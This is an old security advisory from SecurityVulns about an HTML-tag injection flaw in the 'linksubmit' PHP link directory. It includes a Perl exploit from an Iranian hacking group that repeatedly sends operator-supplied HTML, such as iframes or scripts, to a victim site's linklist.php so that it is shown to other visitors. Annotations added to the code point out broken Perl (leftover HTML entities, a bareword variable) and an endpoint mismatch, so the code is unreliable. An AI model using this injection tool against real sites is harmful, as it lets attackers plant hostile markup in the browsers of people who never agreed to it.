securityvulns: SECURITYVULNS:DOC:12063
History: Apr 02, 2006 - 12:00 a.m.

linksubmit <= All version Html Tag Injector in index.php


Vendor : linksubmit
Version : All Version
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
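HTML tags can be submitted in $description (linksubmit.php). The field appears to be accepted and displayed without HTML-encoding, so markup supplied by a submitter is rendered in other visitors' browsers; encoding the description on output closes the issue.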

Exploit :
#!/usr/bin/perl

Exploit by s3rv3r_hack3r

Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and…

######################################################

___ ___ __

/ | \_____ ____ | | __ ___________________

#/ ~ \__ \ / \| |/ // __ \ __ \ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #

\| /(__ )\___ >|_ \\_ >| /___ \

\/ \/ \/ \/ \/ \/

Iran Hackerz Security Team

WebSite: www.hackerz.ir

######################################################

Name : linksubmit

Site : http://www.phpselect.com/

######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;

# Proof-of-concept driver for the linksubmit HTML-injection report: it reads a
# target host and link details from STDIN, then repeatedly sends GET requests
# to linklist.php carrying an operator-typed `description` value.
# NOTE(review): no `use strict` / `use warnings`; every variable below is a
# package global.

# Banner only; no effect on the requests.
print "-------------------------------------------\n";
print "= Iran hacekerz security team =\n";
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";

# Prompts for target host, site name, site URL and e-mail.
# NOTE(review): the eight lines below still contain HTML entities (&quot;,
# &#40;, &lt;, &gt;, &#41;) from the page extraction, so as listed they are
# not valid Perl.
  print &quot;Target &gt;http://&quot;;
  chomp&#40;$targ = &lt;STDIN&gt;&#41;;
  print &quot;your web site name &gt;&quot;;
  chomp&#40;$wwwname= &lt;STDIN&gt;&#41;;
  print &quot;your web site url &gt;&quot;;
  chomp&#40;$wsurl= &lt;STDIN&gt;&#41;;
  print &quot;your email &gt;&quot;;
  chomp&#40;$mail= &lt;STDIN&gt;&#41;;

# Reachability check: fetch linklist.php once and die if get() returns a false
# value (LWP::Simple's get() yields undef on failure). $con is not used again.
$con=get("http://".$targ."/linklist.php") || die "[-]Cannot connect to Host";
# Empty while condition: Perl treats it as always true, so the loop only ends
# when the process is interrupted.
while ()
{
print "Html code\$";
chomp($comd=<STDIN>);
# Defender's view of the request: GET /linklist.php with wsname, wsurl, email
# and description in the query string, concatenated without URL encoding.
# `url` is a bareword, not $wsurl, so the value read at the prompt is not the
# one placed in wsurl. The response in $commd is never inspected, so the script
# cannot tell whether the submission was accepted.
# NOTE(review): the advisory text names linksubmit.php, this script requests
# linklist.php — confirm which endpoint handles submissions. On the application
# side the remedy is to HTML-encode the description when it is rendered and to
# validate it on submit; markup characters in `description` are what to look
# for in access logs.
$commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".url."&email=".$mail."&description=".$comd)
}